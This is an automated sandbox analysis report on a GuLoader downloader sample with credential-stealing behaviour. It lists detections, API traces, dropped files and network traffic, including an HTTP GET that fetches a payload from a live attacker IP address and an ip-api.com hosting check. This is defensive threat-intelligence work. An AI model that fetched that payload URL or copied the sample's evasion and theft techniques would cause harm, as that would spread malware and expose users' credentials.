Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
004552024107.bat.exe

Overview

General Information

Sample name:004552024107.bat.exe
Analysis ID:1465163
MD5:610c22dff8f1f7d12746e879be25d778
SHA1:158ec97fd4604350430ceeeac61f15f386094e9f
SHA256:72553f4f7953a79115252ea22d00ed3aae235f637ce2e44d531b36af06d9b6cf
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Check if machine is in data center or colocation facility
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • 004552024107.bat.exe (PID: 9448 cmdline: "C:\Users\user\Desktop\004552024107.bat.exe" MD5: 610C22DFF8F1F7D12746E879BE25D778)
    • 004552024107.bat.exe (PID: 9904 cmdline: "C:\Users\user\Desktop\004552024107.bat.exe" MD5: 610C22DFF8F1F7D12746E879BE25D778)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.6168473251.0000000034445000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.1249582917.0000000005B81000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: 004552024107.bat.exe PID: 9448JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
        Process Memory Space: 004552024107.bat.exe PID: 9904JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 004552024107.bat.exeAvira: detected
          Source: http://185.222.58.113/ubsFsaZf137.binAvira URL Cloud: Label: malware
          Source: 004552024107.bat.exeVirustotal: Detection: 17%Perma Link
          Source: 004552024107.bat.exeReversingLabs: Detection: 15%
          Source: 004552024107.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 004552024107.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A4F
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_00406620 FindFirstFileA,FindClose,0_2_00406620
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_004027CF FindFirstFileA,0_2_004027CF
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,2_2_00405A4F
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_00406620 FindFirstFileA,FindClose,2_2_00406620
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_004027CF FindFirstFileA,2_2_004027CF
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
          Source: Joe Sandbox ViewIP Address: 185.222.58.113 185.222.58.113
          Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
          Source: unknownDNS query: name: ip-api.com
          Source: global trafficHTTP traffic detected: GET /ubsFsaZf137.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 185.222.58.113Cache-Control: no-cache
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
          Source: global trafficHTTP traffic detected: GET /ubsFsaZf137.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 185.222.58.113Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: ip-api.com
          Source: 004552024107.bat.exe, 00000002.00000002.6151836624.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 004552024107.bat.exe, 00000002.00000002.6153218845.00000000058C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.113/ubsFsaZf137.bin
          Source: 004552024107.bat.exe, 00000002.00000002.6151836624.0000000003CA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.113/ubsFsaZf137.binQ
          Source: 004552024107.bat.exe, 00000002.00000002.6168473251.0000000034411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
          Source: 004552024107.bat.exe, 00000002.00000002.6168473251.0000000034411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
          Source: 004552024107.bat.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: 004552024107.bat.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: 004552024107.bat.exe, 00000002.00000002.6168473251.0000000034411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: 004552024107.bat.exeString found in binary or memory: http://www.skinstudio.netG
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_0040550F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040550F
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033D8
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_004033D8
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_004072D10_2_004072D1
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_00406AFA0_2_00406AFA
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_6D0E1B280_2_6D0E1B28
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_004072D12_2_004072D1
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_00406AFA2_2_00406AFA
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_00154A882_2_00154A88
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_00153E702_2_00153E70
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_001541B82_2_001541B8
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_365E70E82_2_365E70E8
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_365EF4F82_2_365EF4F8
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_365E6F902_2_365E6F90
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_365E99A82_2_365E99A8
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_373787E22_2_373787E2
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_373732B82_2_373732B8
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_373791202_2_37379120
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_373701952_2_37370195
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_373765F82_2_373765F8
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_3737A1E02_2_3737A1E0
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_373A09E02_2_373A09E0
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_373735982_2_37373598
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: String function: 00402C5E appears 52 times
          Source: 004552024107.bat.exe, 00000000.00000002.1247247397.0000000000443000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedissever.exeDVarFileInfo$ vs 004552024107.bat.exe
          Source: 004552024107.bat.exe, 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedissever.exeDVarFileInfo$ vs 004552024107.bat.exe
          Source: 004552024107.bat.exe, 00000002.00000002.6151836624.0000000003D0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 004552024107.bat.exe
          Source: 004552024107.bat.exe, 00000002.00000002.6167311295.0000000034069000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 004552024107.bat.exe
          Source: 004552024107.bat.exeBinary or memory string: OriginalFilenamedissever.exeDVarFileInfo$ vs 004552024107.bat.exe
          Source: 004552024107.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/17@1/2
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033D8
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_004033D8
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_004047BF GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004047BF
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_00402198 CoCreateInstance,MultiByteToWideChar,0_2_00402198
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semesJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeMutant created: NULL
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsa6BC8.tmpJump to behavior
          Source: 004552024107.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\004552024107.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: 004552024107.bat.exeVirustotal: Detection: 17%
          Source: 004552024107.bat.exeReversingLabs: Detection: 15%
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile read: C:\Users\user\Desktop\004552024107.bat.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\004552024107.bat.exe "C:\Users\user\Desktop\004552024107.bat.exe"
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess created: C:\Users\user\Desktop\004552024107.bat.exe "C:\Users\user\Desktop\004552024107.bat.exe"
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess created: C:\Users\user\Desktop\004552024107.bat.exe "C:\Users\user\Desktop\004552024107.bat.exe"Jump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
          Source: 004552024107.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          Source: Yara matchFile source: Process Memory Space: 004552024107.bat.exe PID: 9448, type: MEMORYSTR
          Source: Yara matchFile source: 00000000.00000002.1249582917.0000000005B81000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_6D0E1B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6D0E1B28
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\UserInfo.dllJump to dropped file
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\nsExec.dllJump to dropped file
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\BgImage.dllJump to dropped file
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semesJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Logikprogrammeringer236.AmpJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Allopurinol.fluJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\UafrysteligtJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Uafrysteligt\Gearing30.AmfJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Uafrysteligt\Charting.skrJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Uafrysteligt\chokoladeforretning.marJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\KolonimagtenJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Kolonimagten\doubling.regJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Kolonimagten\hmoriderne.nerJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Kolonimagten\lvens.flbJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Kolonimagten\materialiter.sigJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Branchiostomidae11Jump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Branchiostomidae11\preinvest.priJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Branchiostomidae11\ridningen.txtJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
